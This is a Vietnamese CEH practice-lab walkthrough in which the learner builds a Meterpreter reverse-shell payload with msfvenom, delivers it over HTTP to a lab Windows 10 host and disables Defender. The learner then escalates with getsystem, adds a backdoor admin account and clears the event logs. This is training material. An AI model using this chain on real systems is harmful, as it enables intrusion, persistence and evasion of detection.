Nếu một hệ thống chưa được vá với các bản cập nhật mới nhất hoặc không được định cấu hình bảo mật đầy đủ, hệ thống đó rất dễ bị tấn công. Người dùng, mặc dù hệ thống đang được cấu hình, vẫn có thể bị thuyết phục thực thi một ứng dụng độc hại, điều này cho phép kẻ tấn công giành quyền kiểm soát hệ thống. Có nhiều công cụ khác nhau có thể được sử dụng để xâm nhập vào hệ thống. Msfvenom là một trong những công cụ như vậy. Nó cho phép bạn tạo các tải trọng tùy chỉnh, có thể được triển khai cho hệ thống của người dùng. Để triển khai một ứng dụng độc hại, tin tặc có thể sử dụng phương pháp kỹ thuật xã hội.

Msfvenom là sự kết hợp của hai công cụ khác nhau, Msfpayload và Msfencode, là một phần của Kali Linux. Chức năng của cả hai công cụ sau đó được kết hợp thành một công cụ duy nhất có tên Msfvenom. Tuy nhiên, cả hai công cụ Msfpayload và Msfencode vẫn tồn tại trong Kali Linux dưới dạng các công cụ độc lập.

Trong bài tập này, bạn sẽ tìm hiểu về cách tạo một tải trọng độc lập với Msfvenom và triển khai nó trên máy chủ được nhắm mục tiêu để khai thác.

Kết quả học tập

Sau khi hoàn thành bài tập này, bạn sẽ có thể:

  • Tạo một tải trọng
  • Chia sẻ gánh nặng với nạn nhân
  • Sử dụng mô-đun Multi / handler và khai thác hệ thống

Thiết bị của bạn

Bạn sẽ sử dụng thiết bị sau trong phòng thí nghiệm này. Vui lòng bật nguồn thiết bị.

  • PLABDC01 – (Windows Server 2019 – Máy chủ miền)
  • PLABWIN10 – (Windows 10 – Máy trạm)
  • PLABKALI01 – (Kali 2019.2 – Máy trạm Linux Kali)
Ảnh chụp màn hình Practice Labs.

Nhiệm vụ 1 – Tạo một tải trọng

Msfvenom được thiết kế để tạo các tải trọng độc lập. Để sử dụng công cụ này, bạn không cần gọi khung công tác Metasploit và nó có thể hoạt động trực tiếp từ dấu nhắc lệnh trong Kali Linux.

Với lệnh msfvenom, bạn có thể liệt kê tất cả các tải trọng có sẵn hoặc chọn một tải trọng. Để chọn trọng tải, hãy thực hiện các bước sau:

Bước 1

Đảm bảo rằng bạn được kết nối với PLABKALI01 .

Các thông tin đăng nhập nếu được yêu cầu như sau

Tên người dùng: root

Mật khẩu: Passw0rd

Trên màn hình nền, trong ngăn bên trái, nhấp vào biểu tượng Thiết bị đầu cuối .

Hình 3.1 Ảnh chụp màn hình PLABKALI01
Hình 3.1 Ảnh chụp màn hình PLABKALI01: Nhấp vào biểu tượng Terminal ở khung bên trái.

Bước 2

Bạn có thể liệt kê các tải trọng hiện có với msfvenom . Để thực hiện việc này, hãy nhập lệnh sau:

msfvenom -l payloads

Nhấn Enter .

Hình 3.2 Ảnh chụp màn hình PLABKALI01
Hình 3.2 Ảnh chụp màn hình PLABKALI01: Nhập lệnh msfvenom để liệt kê các trọng tải.

Bước 3

Kết quả của lệnh này được hiển thị.Lưu ý: Bạn có thể cuộn lên để xem danh sách các trọng tải ngay từ đầu.

Hình 3.3 Ảnh chụp màn hình PLABKALI01
Hình 3.3 Ảnh chụp màn hình PLABKALI01: Hiển thị danh sách các tải trọng dưới dạng đầu ra của lệnh msfvenom.

Bước 4

Xóa màn hình bằng cách nhập lệnh sau:

clear

Bạn có thể chọn tải trọng với tham số -p . Để thực hiện việc này, hãy nhập lệnh sau:Lưu ý: Tham số – f được sử dụng để chỉ định định dạng tệp. Các -o tham số thiết lập tùy chọn đúng được sử dụng với các mô-đun.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.4 -f exe -o payload.exe

Nhấn Enter .

Hình 3.4 Ảnh chụp màn hình PLABKALI01
Hình 3.4 Ảnh chụp màn hình PLABKALI01: Nhập lệnh để chọn tải trọng và đặt định dạng tệp và các tùy chọn.

Bước 5

Lưu ý đầu ra của lệnh đã cho. Tải trọng thực thi với tên payload.exe hiện đã được tạo.

Hình 3.5 Ảnh chụp màn hình PLABKALI01
Hình 3.5 Ảnh chụp màn hình PLABKALI01: Hiển thị đầu ra của lệnh msfvenom.

Giữ cửa sổ đầu cuối mở.

Nhiệm vụ 2 – Chia sẻ gánh nặng với nạn nhân

Sau khi tạo tải trọng, bạn cần đảm bảo rằng nó đến được hệ thống của nạn nhân bằng bất kỳ phương tiện nào. Ví dụ: bạn có thể chia sẻ nó trên USB, điều này có thể không thực hiện được nếu bạn đang ở một thành phố hoặc quốc gia khác. Phương pháp dễ nhất có thể là chia sẻ nó trên Web, nạn nhân có thể tải xuống.

Trong nhiệm vụ này, bạn sẽ học cách thỏa hiệp với máy chủ. Để thực hiện việc này, hãy thực hiện các bước sau:

Bước 1

Tiếp theo, bạn cần đảm bảo rằng tệp này có sẵn cho hệ thống đích. Bạn cần khởi động SimpleHTTPServer , trình này sẽ cung cấp tệp. Để thực hiện việc này, hãy nhập lệnh sau:

python -m SimpleHTTPServer

Nhấn Enter .

Hình 3.6 Ảnh chụp màn hình PLABKALI01
Hình 3.6 Ảnh chụp màn hình PLABKALI01: Nhập lệnh khởi động SimpleHTTPServer.

Bước 2

Lưu ý rằng SimpleHTTPServer hiện đã khởi động.

Hình 3.7 Ảnh chụp màn hình PLABKALI01
Hình 3.7 Ảnh chụp màn hình PLABKALI01: Hiển thị Máy chủ web SimpleHTTPServer đã khởi động.

Bước 3

Kết nối với PLABWIN10 . Màn hình nền của nó được hiển thị.

Hình 3.8 Ảnh chụp màn hình PLABWIN10
Hình 3.8 Ảnh chụp màn hình PLABWIN10: Hiển thị màn hình nền của hệ thống PLABWIN10.

Bước 4

Trong hộp văn bản Nhập vào đây để tìm kiếm , hãy nhập nội dung sau:

Internet Explorer

Từ kết quả tìm kiếm, chọn Internet Explorer .

Hình 3.9 Ảnh chụp màn hình PLABWIN10
Hình 3.9 Ảnh chụp màn hình PLABWIN10: Chọn Internet Explorer từ kết quả tìm kiếm.

Bước 5

http://192.168.0.4:8000/payload.exe

Lưu ý: Việc tải xuống và thực thi tệp này sẽ tạo ra một kết nối ngược đến hệ thống của kẻ tấn công. Trong mô-đun tiếp theo, bạn sẽ học cách xâm nhập hệ thống của nạn nhân bằng cách thực thi tải trọng.

Hình 3.10 Ảnh chụp màn hình PLABWIN10
Hình 3.10 Ảnh chụp màn hình PLABWIN10: Hiển thị URL của tệp payload.exe đang được nhập vào thanh địa chỉ.

Bước 6

Lưu ý rằng payload.exe hiện đang được nhắc tải xuống trên hệ thống của người dùng. Nhấp vào Lưu .Lưu ý: Trong trường hợp thực tế, bạn sẽ không đặt tên tệp là payload.exe. Nó thường sẽ là một số tên thú vị, sẽ thu hút người dùng tải xuống tệp. Ngoài ra, trong hầu hết các trường hợp, các tệp này được bảo vệ theo cách để tránh bị bộ quét chống vi-rút bắt.

Hình 3.11 Ảnh chụp màn hình PLABWIN10
Hình 3.11 Ảnh chụp màn hình PLABWIN10: Hiển thị tệp payload.exe đang được nhắc tải xuống trong hệ thống của nạn nhân và lưu tệp.

Bước 7

Trong thanh thông báo, nhấp vào Xem tải xuống .

Hình 3.12 Ảnh chụp màn hình PLABWIN10
Hình 3.12 Ảnh chụp màn hình PLABWIN10: Nhấp vào nút Mở thư mục trên thanh thông báo.

Bước 8

Các Xem Tải xuống – Internet Explorer hộp thoại sẽ được hiển thị. Nhấp chuột phải vào tệp payload.exe và chọn Mở thư mục chứa .

Hình 3.13 Ảnh chụp màn hình PLABWIN10
Hình 3.13 Ảnh chụp màn hình PLABWIN10: Nhấp chuột phải vào tệp payload.exe và chọn Mở thư mục chứa.

Bước 9

Các File Explorer cửa sổ được mở ra. Lưu ý rằng tệp payload.exe hiện đã được tải xuống trong thư mục Tải xuống .

Hình 3.14 Ảnh chụp màn hình PLABWIN10
Hình 3.14 Ảnh chụp màn hình PLABWIN10: Hiển thị tệp payload.exe trong thư mục Downloads trong cửa sổ File Explorer.

Nhiệm vụ 3 – Sử dụng Mô-đun Multi / Handler và Khai thác Hệ thống

Vì bạn đã tạo một mô-đun độc lập, nó sẽ không thể tạo kết nối giữa bạn và hệ thống của nạn nhân. Phương pháp duy nhất là sử dụng các mô-đun đa / xử lý, mà sẽ bắt kết nối Meterpreter khi payload.exe được thực hiện trên hệ thống của nạn nhân.

Để sử dụng mô-đun multi / handler, hãy thực hiện các bước sau:

Bước 1

Kết nối với PLABKALI01 . Lưu ý rằng SimpleHTTPServer vẫn đang chạy.

Hình 3.15 Ảnh chụp màn hình PLABKALI01
Hình 3.15 Ảnh chụp màn hình PLABKALI01: Hiển thị cửa sổ đầu cuối.

Bước 2

Bạn cần khởi động msfconsole . Trong màn hình nền, hãy nhấp vào biểu tượng khung metasploit .

Trong cửa sổ dòng lệnh, nhập

msfconsole

Hình 3.16 Ảnh chụp màn hình PLABKALI01
Hình 3.16 Ảnh chụp màn hình PLABKALI01: Chạy lệnh python -m SimpleHTTPServer trong cửa sổ đầu cuối.

Bước 3

Các Metasploit Framework bắt đầu và hiển thị các msfconsole nhắc.

Bạn cần đặt mô-đun multi / handler .

Nhập lệnh sau:

use multi/handler

Nhấn Enter .

Hình 3.17 Ảnh chụp màn hình PLABKALI01
Hình 3.17 Ảnh chụp màn hình PLABKALI01: Thiết lập mô-đun multi / handler.

Bước 4

Mô-đun hiện đã được thiết lập. Tiếp theo, bạn cần đặt tải trọng windows / meterpreter / reverse_tcp , được sử dụng với msfvenom . Để thực hiện việc này, hãy nhập lệnh sau:

set payload windows/meterpreter/reverse_tcp

Nhấn Enter .

Hình 3.18 Ảnh chụp màn hình PLABKALI01
Hình 3.18 Ảnh chụp màn hình PLABKALI01: Đặt tải trọng windows / métpreter / reverse_tcp.

Bước 5

Tải trọng hiện đã được thiết lập. Nhập lệnh sau để xem các tùy chọn của nó:

show options

Nhấn Enter .

Hình 3.19 Ảnh chụp màn hình PLABKALI01
Hình 3.19 Ảnh chụp màn hình PLABKALI01: Nhập lệnh hiển thị tùy chọn.

Bước 6

Lưu ý đầu ra của lệnh này. Bạn sẽ cần đặt máy chủ cục bộ, máy chủ chưa được đặt. Bạn có thể sử dụng cổng mặc định.

Để đặt giá trị LHOST , hãy nhập lệnh sau:

set LHOST 192.168.0.4

Nhấn Enter .

Hình 3.20 Ảnh chụp màn hình PLABKALI01
Hình 3.20 Ảnh chụp màn hình PLABKALI01: Cài đặt giá trị LHOST.

Bước 7

Lưu ý rằng giá trị của LHOST hiện được đặt thành 192.168.0.4 .Lưu ý: Bạn có thể chạy lại lệnh tùy chọn hiển thị để xác minh giá trị.

Hình 3.21 Ảnh chụp màn hình PLABKALI01
Hình 3.21 Ảnh chụp màn hình PLABKALI01: Hiển thị đầu ra của lệnh LHOST.

Bước 8

Cuối cùng, đã đến lúc kích hoạt tải trọng. Nhập lệnh sau:

exploit

Nhấn Enter .

Hình 3.22 Ảnh chụp màn hình PLABKALI01
Hình 3.22 Ảnh chụp màn hình PLABKALI01: Nhập lệnh khai thác.

Bước 9

Phiên làm việc hiện đã bắt đầu.

Hình 3.23 Ảnh chụp màn hình PLABKALI01
Hình 3.23 Ảnh chụp màn hình PLABKALI01: Hiển thị phần bắt đầu của trình xử lý TCP ngược trong Kali.

Bước 10

Chuyển về PLABWIN10 . Bạn sẽ ở trong thư mục Tải xuống .Cảnh báo: Đảm bảo rằng Tường lửa của Windows được đặt thành Tắt. Bạn cũng cần dừng Windows Defender để các bước tiếp theo thành công.
Vui lòng tham khảo Bài tập 1, Nhiệm vụ 1 về việc tắt Tường lửa của Windows.
Các bước sau sẽ trình bày chi tiết về việc dừng Windows Defender.

Thu nhỏ tất cả các cửa sổ đang mở để truy cập màn hình nền.

Nhấp vào thanh Loại ở đây để tìm kiếm và nhập Trung tâm Bảo mật của Bộ bảo vệ Windows và nhấp vào kết quả.

Hình 3.24 Ảnh chụp màn hình PLABWIN10
Hình 3.24 Ảnh chụp màn hình PLABWIN10: Hiển thị Trung tâm Bảo mật của Bộ bảo vệ Windows đang được tìm kiếm trong hệ thống.

Bước 11

Trên Cửa sổ Trung tâm Bảo mật của Bộ bảo vệ Windows,

Nhấp vào Bảo vệ khỏi mối đe dọa và vi-rút.

Hình 3.25 Ảnh chụp màn hình PLABWIN10
Hình 3.25 Ảnh chụp màn hình PLABWIN10: Hiển thị cửa sổ Trung tâm Bảo mật của Bộ bảo vệ Windows và tính năng Bảo vệ khỏi mối đe dọa và vi-rút được tô sáng.

Bước 12

Nhấp vào cài đặt bảo vệ chống vi-rút và mối đe dọa

Hình 3.26 Ảnh chụp màn hình PLABWIN10
Hình 3.26 Ảnh chụp màn hình PLABWIN10: Hiển thị cửa sổ Trung tâm Bảo mật của Bộ bảo vệ Windows, các cài đặt bảo vệ chống vi-rút & mối đe dọa được đánh dấu.

Bước 13

Trong phần Bảo vệ thời gian thực , nhấp vào nút để chuyển tùy chọn này thành Tắt.Nếu tùy chọn này không được đặt thành Tắt, các bước sau trên KALI sẽ không thành công.

Hình 3.27 Ảnh chụp màn hình PLABWIN10
Hình 3.27 Ảnh chụp màn hình PLABWIN10: Hiển thị cửa sổ Trung tâm Bảo mật của Bộ bảo vệ Windows, Chế độ bảo vệ thời gian thực đã được nhấp để Tắt.

Bước 14

Đóng Trung tâm Bảo mật của Bộ bảo vệ Windows.

Mở thư mục Tải xuống . Đây có thể là một tab đang mở hoặc nhấp vào File Explorer trên thanh tác vụ và nhấp vào Tải xuống trên bảng điều khiển bên trái.

Bấm đúp để thực thi tệp payload.exe .

Lưu ý rằng không có gì xảy ra trong PLABWIN10 sau khi bạn bấm đúp vào tệp.

Hình 3.28 Ảnh chụp màn hình PLABWIN10
Hình 3.28 Ảnh chụp màn hình PLABWIN10: Nhấp đúp vào tệp trọng tải trong File Explorer.

Bước 15

Chuyển về PLABKALI01 . Chú ý rằng một Meterpreter kết nối với PLABWIN10 hiện đang thiết lập thành công.Lưu ý: Nếu bạn nhận được lời nhắc liên quan đến bộ lọc SmartScreen, hãy nhấp vào Chạy.

Hình 3.29 Ảnh chụp màn hình PLABKALI01
Hình 3.29 Ảnh chụp màn hình PLABKALI01: Hiển thị lời nhắc máy đo thông số với kết nối thành công với PLABWIN10.

Bước 16

Để nhận chi tiết tài khoản người dùng đã đăng nhập hiện tại của PLABWIN10 , hãy nhập lệnh sau:

getuid

Nhấn Enter .

Hình 3.30 Ảnh chụp màn hình PLABKALI01
Hình 3.30 Ảnh chụp màn hình PLABKALI01: Nhập lệnh getuid.

Bước 17

Chú ý tên tài khoản người dùng đã đăng nhập hiện tại được hiển thị.

Hình 3.31 Ảnh chụp màn hình PLABKALI01
Hình 3.31 Ảnh chụp màn hình PLABKALI01: Hiển thị đầu ra của lệnh getuid.

Bước 18

Bạn có thể thực hiện báo cáo đặc quyền bằng cách gõ lệnh sau:

getsystem

Nhấn Enter .

Hình 3.32 Ảnh chụp màn hình PLABKALI01
Hình 3.32 Ảnh chụp màn hình PLABKALI01: Nhập lệnh getystem.

Bước 19

Lệnh chạy thành công. Nâng cấp đặc quyền hiện đã thành công.

Hình 3.33 Ảnh chụp màn hình PLABKALI01
Hình 3.33 Ảnh chụp màn hình PLABKALI01: Hiển thị đầu ra của lệnh getystem.

Bước 20

Lưu ý: Lệnh Clear không hoạt động trên trình bao lệnh métpreter. Nhấn Enter nhiều lần để hiển thị một cửa sổ sạch.

Hãy mở dấu nhắc lệnh của Windows. Nhập lệnh sau:

shell

Nhấn Enter .

Hình 3.34 Ảnh chụp màn hình PLABKALI01
Hình 3.34 Ảnh chụp màn hình PLABKALI01: Nhập lệnh shell.

Bước 21

Lưu ý rằng dấu nhắc lệnh Windows được hiển thị.

Hình 3.35 Ảnh chụp màn hình PLABKALI01
Hình 3.35 Ảnh chụp màn hình PLABKALI01: Hiển thị đầu ra của lệnh shell.

Bước 22

Bây giờ bạn có thể sử dụng tất cả các lệnh của dấu nhắc lệnh Windows. Nhập lệnh sau:

net users

Nhấn Enter .

Hình 3.36 Ảnh chụp màn hình PLABKALI01
Hình 3.36 Ảnh chụp màn hình PLABKALI01: Nhập lệnh net users.

Bước 23

Kết quả của lệnh người dùng mạng được hiển thị.

Hình 3.37 Ảnh chụp màn hình PLABKALI01
Hình 3.37 Ảnh chụp màn hình PLABKALI01: Hiển thị đầu ra của lệnh net users.

Bước 24

Bạn đã thấy những người dùng hiện có trên hệ thống PLABWIN10 . Bạn luôn có thể kiểm soát liên tục hệ thống bằng cách tạo người dùng có đặc quyền quản trị. Đầu tiên, hãy tạo một người dùng mới trên hệ thống PLABWIN10 . Nhập lệnh sau:Lưu ý: Bạn có thể xác định bất kỳ mật khẩu nào, nhưng nó phải phức tạp. Nếu nó không đủ phức tạp, Windows sẽ tạo ra lỗi.

net user /add plabuser Test**1234

Nhấn Enter .

Hình 3.38 Ảnh chụp màn hình PLABKALI01
Hình 3.38 Ảnh chụp màn hình PLABKALI01: Nhập lệnh để tạo người dùng mới có tên plabuser.

Bước 25

Lưu ý rằng plabuser hiện đã được tạo trên hệ thống PLABWIN10 .

Hình 3.39 Ảnh chụp màn hình PLABKALI01
Hình 3.39 Ảnh chụp màn hình PLABKALI01: Hiển thị việc tạo thành công plabuser.

Bước 26

Bây giờ hãy thêm plabuser vào nhóm Quản trị viên cục bộ . Để thực hiện việc này, hãy nhập lệnh sau:

net localgroup administrators plabuser /add

Nhấn Enter .

Hình 3.40 Ảnh chụp màn hình PLABKALI01
Hình 3.40 Ảnh chụp màn hình PLABKALI01: Nhập lệnh để thêm plab vào nhóm Quản trị viên cục bộ.

Bước 27

Các plabuser tại được thêm vào địa phương quản trị nhóm.

Hình 3.41 Ảnh chụp màn hình PLABKALI01
Hình 3.41 Ảnh chụp màn hình PLABKALI01: Hiển thị việc bổ sung thành công plabuser vào nhóm quản trị viên cục bộ.

Bước 28

Bạn có thể thoát khỏi dấu nhắc lệnh của Windows. Gõ lệnh sau

exit

Nhấn Enter . Bạn đang trở lại trên Meterpreter command prompt.

Hình 3.42 Ảnh chụp màn hình PLABKALI01
Hình 3.42 Ảnh chụp màn hình PLABKALI01: Thoát khỏi dấu nhắc lệnh của Windows.

Bước 29

Để đảm bảo rằng bạn không bị theo dõi, bạn có thể xóa bất kỳ loại dấu vết nào mà trọng tải phải để lại. Để thực hiện việc này, bạn cần xóa tất cả nhật ký trên hệ thống Windows. Nhập lệnh sau:

clearev

Nhấn Enter .

Hình 3.43 Ảnh chụp màn hình PLABKALI01
Hình 3.43 Ảnh chụp màn hình PLABKALI01: Nhập lệnh clearev.

Bước 30

Lưu ý rằng các tệp nhật ký hiện đã bị xóa.

Hình 3.44 Ảnh chụp màn hình PLABKALI01
Hình 3.44 Ảnh chụp màn hình PLABKALI01: Hiển thị đầu ra của lệnh clearev.

Hoàn thành , hãy thực hành thêm CBT CEH v11 Lab Guide để re-inforce kiến thức, trau dồi kỹ năng.

Để đăng kí lab thực hành online Security365 Practice Labs vui lòng liên hệ admin Đại Ngọc Sơn

Zalo : Security365 – 0911486676

Trả lời

Please log in using one of these methods to post your comment:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Đăng xuất /  Thay đổi )

Google photo

Bạn đang bình luận bằng tài khoản Google Đăng xuất /  Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Đăng xuất /  Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Đăng xuất /  Thay đổi )

Connecting to %s